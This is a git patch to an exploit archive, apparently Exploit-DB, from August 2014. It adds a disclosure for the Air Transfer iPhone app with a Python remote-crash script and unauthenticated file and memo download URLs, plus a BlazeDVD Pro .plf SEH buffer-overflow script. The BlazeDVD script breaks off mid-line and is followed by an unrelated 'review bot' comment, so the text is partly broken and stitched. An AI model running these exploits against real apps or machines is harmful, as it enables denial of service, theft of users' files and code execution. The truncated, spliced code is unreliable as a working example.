From b737a287b1fdadb7a4519e82a8bee0b194f47227 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Mon, 25 Aug 2014 04:41:28 +0000
Subject: [PATCH] Updated 08_25_2014
---
 files.csv | 2 +
 platforms/ios/remote/34399.txt | 107 +++++++++++++++++++++++++++++++
 platforms/windows/local/34371.py | 61 ++++++++++++++++++
 3 files changed, 170 insertions(+)
 create mode 100755 platforms/ios/remote/34399.txt
 create mode 100755 platforms/windows/local/34371.py
diff --git a/files.csv b/files.csv
index 8e129a7d8..9acfa48c9 100755
--- a/files.csv
+++ b/files.csv
@@ -30958,6 +30958,7 @@ id,file,description,date,author,platform,type,port
 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder '.mp3' File Remote Buffer Overflow Vulnerability",2009-10-31,4m!n,windows,dos,0
 34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass Vulnerability",2010-07-23,IBM,multiple,remote,0
 34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 'wsnavigator' Cross Site Scripting Vulnerability",2010-07-23,"Alexandr Polyakov",jsp,webapps,0
+34371,platforms/windows/local/34371.py,"BlazeDVD Pro 7.0 (.plf) - Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0
 34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 Cross Site Scripting and HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0
 34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 SQL Injection and Cross Site Scripting Vulnerabilities",2010-07-25,MustLive,php,webapps,0
 34374,platforms/php/webapps/34374.txt,"Joomla! FreiChat Component 1.0/2.x Unspecified HTML Injection Vulnerability",2010-07-26,nag_sunny,php,webapps,0
@@ -30983,3 +30984,4 @@ id,file,description,date,author,platform,type,port
 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 'From:' Header Processing Remote Denial Of Service Vulnerability",2010-08-03,"Rodrigo Escobar",windows,dos,0
 34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 Multiple Cross Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0
 34397,platforms/asp/webapps/34397.txt,"Activedition 'activedition/aelogin.asp' Multiple Cross Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0
+34399,platforms/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",ios,remote,0
diff --git a/platforms/ios/remote/34399.txt b/platforms/ios/remote/34399.txt
new file mode 100755
index 000000000..4c82211ca
--- /dev/null
+++ b/platforms/ios/remote/34399.txt
@@ -0,0 +1,107 @@
+# Exploit Title: Air Transfer Iphone v1.3.9 -Remote crash, Broken Authentication file download and Memo Access.
+# Date: 08/23/2014
+# Author: Samandeep Singh (SaMaN - @samanL33T )
+# Vendor Homepage:http://www.darinsoft.co.kr/sub_htmls/airtransfer_guide.html
+ https://itunes.apple.com/us/app/air-transfer/id521595136?mt=8
+# Category: WebApp
+# Version: 1.3.9
+# Patch/ Fix: Not available
+---------------------------------------------------
+
+Disclosure Time line
+=======================
+[Aug. 19 2014] Vendor Contacted
+[Aug. 19 2014] Vendor replied
+[Aug. 19 2014] Vendor Informed about vulnerability with POC.(No reply received)
+[Aug. 21 2014] Notified vendor about Public disclosure after 24 hours (No reply received)
+[Aug. 23 2014] Public Disclosure.
+
+--------------------------------------------------------
+
+Product & Service Details:
+==========================
+Air Transfer - Easy file sharing between PC and iPhone/iPad, File Manager with Document Viewer, Video Player, Music Player and Web Browser.
+
+Features include:
+-----------------
+
+* The easiest way to transfer files between PC and iPhone/iPad !
+* Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection !
+
+
+
+Vulnerability details
+=========================
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+1. Remote Application Crashing
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+#!/usr/bin/python
+import socket
+import sys
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+host=raw_input("Enter IP : ")
+port=8080
+def connect():
+ try:
+ s.connect((str(host),port))
+ except socket.error:
+ print "Error: couldn't connect"
+ sys.exit()
+ return "connected to target"
+#Crashing the App
+def crashing():
+ req="GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1\r\n\r\n"
+ try:
+ s.sendall(req)
+ except:
+ print "Error occured, Couldn't crash App"
+ sys.exit()
+ return "Application Down, Conection closed"
+print connect()
+print crashing()
+______________________________________________________________________________________________________________________________
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+2. Broken Authentication - Memo access & File download.
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+To download any file simply visit:
+
+http://:8080/?downloadSingle?id=1
+
+Just by incrementing the value of "id" we can download all the files.
+
+TO view saved memos visit the below link:
+
+http://:8080/getText?id=0
+
+
+We can look for all the memos by incrementing the value of "id"
+
+
+
+#SaMaN(@samanL33T)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/windows/local/34371.py b/platforms/windows/local/34371.py
new file mode 100755
index 000000000..f070f24b7
--- /dev/null
+++ b/platforms/windows/local/34371.py
@@ -0,0 +1,61 @@
+# BlazeDVD Pro v7.0 - (.plf) Buffer Overflow SEH
+# Date: 19.08.2014
+# Exploit Author: metacom
+# Vendor Homepage: http://www.blazevideo.com/
+# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
+# Version: 7.0.0.0
+# Tested on: Win 7 EN, Win 8.1
+
+
+#!/usr/bin/python
+
+from struct import pack
+
+buffer= "\x41" * 608
+nseh="\xeb\x06\xff\xff"
+seh=pack("
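Review bot: The header line `# Patch/ Fix: Not available` is the only remediation statement in the 34399.txt advisory, so readers get no interim mitigation for the unauthenticated `downloadSingle` and `getText` endpoints it documents on port 8080. A short mitigation paragraph after the disclosure timeline — keep the app's transfer service stopped when not in use and enable it only on a trusted network, since the advisory indicates the service answers requests without authentication — would make the write-up actionable for defenders. A vendor or CVE reference line is also missing from the header, which makes the issue harder to track once a fix ships.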